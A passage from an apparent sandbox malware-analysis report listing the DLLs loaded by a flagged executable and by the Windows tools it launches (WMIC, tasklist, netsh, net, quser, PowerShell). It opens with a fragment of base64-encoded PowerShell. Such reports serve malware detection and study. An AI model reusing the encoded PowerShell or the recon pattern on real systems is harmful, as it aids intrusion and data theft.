QBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: libffi-7.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: sbiedll.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: napinsp.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: wshbth.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: nlaapi.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\HOSTNAME.EXE Section loaded: winrnr.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\query.exe Section loaded: regapi.dll
Source: C:\Windows\System32\quser.exe Section loaded: winsta.dll
Source: C:\Windows\System32\quser.exe Section loaded: utildll.dll
Source: C:\Windows\System32\quser.exe Section loaded: samcli.dll
Source: C:\Windows\System32\quser.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
